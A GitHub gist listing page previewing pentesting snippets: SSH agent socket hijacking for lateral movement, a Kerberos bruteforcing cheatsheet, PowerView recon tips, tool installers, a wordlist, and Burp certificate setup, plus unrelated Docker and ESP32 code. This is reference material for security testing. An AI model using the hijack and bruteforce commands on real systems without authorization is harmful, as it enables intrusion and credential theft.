Skip to content

Instantly share code, notes, and snippets.

View ikuamike's full-sized avatar

Michael Ikua ikuamike

75 followers · 76 following
View GitHub Profile
@int0x80
int0x80 / SSH Agent Forwarding.md
Created January 7, 2021 00:59

Here's one of my favorite techniques for lateral movement: SSH agent forwarding. Use a UNIX-domain socket to advance your presence on the network. No need for passwords or keys.

root@bastion:~# find /tmp/ssh-* -type s
/tmp/ssh-srQ6Q5UpOL/agent.1460

root@bastion:~# SSH_AUTH_SOCK=/tmp/ssh-srQ6Q5UpOL/agent.1460 ssh [email protected]

user@internal:~$ hostname -f
internal.company.tld
@ropnop
ropnop / docker_aliases.sh
Created July 18, 2019 02:16
Docker aliases
function dockershell() {
docker run --rm -i -t --entrypoint=/bin/bash "$@"
}
function dockershellsh() {
docker run --rm -i -t --entrypoint=/bin/sh "$@"
}
function dockershellhere() {
dirname=${PWD##*/}
@TarlogicSecurity
TarlogicSecurity / kerberos_attacks_cheatsheet.md
Created May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@OffXec
OffXec / pentest.sh
Last active August 31, 2022 13:25
Installs pentesting tools, then symlinks them to be ran seamlessly.
#/bin/bash
git clone https://github.com/danielmiessler/SecLists.git /opt/seclists
git clone https://github.com/s0md3v/XSStrike.git /opt/xsstrike
sudo ln -s /opt/xsstrike/xsstrike.py /usr/local/bin/xsstrike
chmod +x /opt/xsstrike/xsstrike.py
git clone https://github.com/s0md3v/Arjun.git /opt/arjun
sudo ln -s /opt/arjun/arjun.py /usr/local/bin/arjun
@nullenc0de
nullenc0de / content_discovery_nullenc0de.txt
Last active October 28, 2024 18:53
content_discovery_nullenc0de.txt
This file has been truncated, but you can view the full file.
/
$$$lang-translate.service.js.aspx
$367-Million-Merger-Blocked.html
$defaultnav
${idfwbonavigation}.xml
$_news.php
$search2
£º
.0
/0
@laurivosandi
laurivosandi / esp32-oled-demo.py
Last active February 8, 2022 03:22
OLED screen demo on ESP32 with MicroPython
# Pull the SDD1306 lib from here https://github.com/adafruit/micropython-adafruit-ssd1306/blob/master/ssd1306.py
from time import sleep_ms
from machine import Pin, I2C
from ssd1306 import SSD1306_I2C
buf = "wubba lubba dub dub "
i2c = I2C(-1, Pin(4),Pin(5),freq=40000) # Bitbanged I2C bus
assert 60 in i2c.scan(), "No OLED display detected!"
@EdOverflow
EdOverflow / github_bugbountyhunting.md
Last active November 8, 2024 20:13
My tips for finding security issues in GitHub projects.

GitHub for Bug Bounty Hunters

GitHub repositories can disclose all sorts of potentially valuable information for bug bounty hunters. The targets do not always have to be open source for there to be issues. Organization members and their open source projects can sometimes accidentally expose information that could be used against the target company. in this article I will give you a brief overview that should help you get started targeting GitHub repositories for vulnerabilities and for general recon.

Mass Cloning

You can just do your research on github.com, but I would suggest cloning all the target's repositories so that you can run your tests locally. I would highly recommend @mazen160's GitHubCloner. Just run the script and you should be good to go.

$ python githubcloner.py --org organization -o /tmp/output
@HarmJ0y
HarmJ0y / PowerView-3.0-tricks.ps1
Last active November 17, 2024 06:10
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
@oaass
oaass / thpsetup.py
Last active April 12, 2023 00:54
This will install the additional tools to Kali recommended by "The Hacker Playbook". It will install the tools in /opt/tools
#!/bin/bash
echo ""
echo "=========================================================================="
echo "= Pentest Attack Machine Setup ="
echo "= Based on the setup from The Hacker Playbook ="
echo "=========================================================================="
echo ""
# Prepare tools folder
@PaulSec
PaulSec / Burp certificate on Android
Created February 16, 2015 19:40
Add your Burp certificate on an Android device
To do so:
1. Export your Burp Certificate
Proxy > Options > CA Certificate > Export in DER format
2. Convert it to PEM
openssl x509 -inform der -in cacert.der -out burp.pem
3. Download it on the device